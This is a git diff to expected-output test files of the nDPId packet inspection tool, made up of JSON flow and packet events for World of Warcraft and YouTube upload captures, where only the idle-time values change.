+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":4586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1437859398661} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 diff --git a/test/results/youtubeupload.pcap.out b/test/results/youtubeupload.pcap.out index 6ea8e6868..879994e09 100644 --- a/test/results/youtubeupload.pcap.out +++ b/test/results/youtubeupload.pcap.out @@ -3,21 +3,21 @@ 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1511102576794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576794,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAT5AAIARbUHAqAIbrNkXb8rVAbsFThECDZHSvk7nMdgaUTAzOQFHnN3hyT1jd4lP+l6gAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAc5gRWgAAAABmJfKEu+Ky\/D790R+7T+2\/0X2\/pJXF+QSwhgBhJRTmB2QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} 02258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1511102576850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576850,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTpL9CJHSvk7nMdgaAY7UOy2eqBjwqYbdQEABH3gBAQD\/\/\/\/6BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAEbxGDSLTF1Q0EvnndIQSTAo6qDgodwKRUkl\/wgXSXZEn9QM2BlHJ5TGchczmqfpPPkVE8tMlsFMfVeayelDb2fy4YzLDv2N+n2kP+GPU+AvJ+LZZRk0N6KyGXGuCIybXc0DgBajeTEN+eTXljBGAiEAu2XBBVnB4JB\/pAM2aIMKtRsM68whkJeFp\/sUQ4KWuigCIQClJ1nIthgBruSaqgIGHfDqWyoEY6pcU10gsmGqIhMu0lNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADPfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1511102576851,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576851,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTrHlCJHSvk7nMdgaAjk3HVeItBZp3u\/MM6QBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1511102578051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578051,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAV5AAIARbSHAqAIbrNkXb\/MYAbsFTi5hDQjRAddSQpCnUTAzOQGXrkR+sB0UFtwM1LigAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0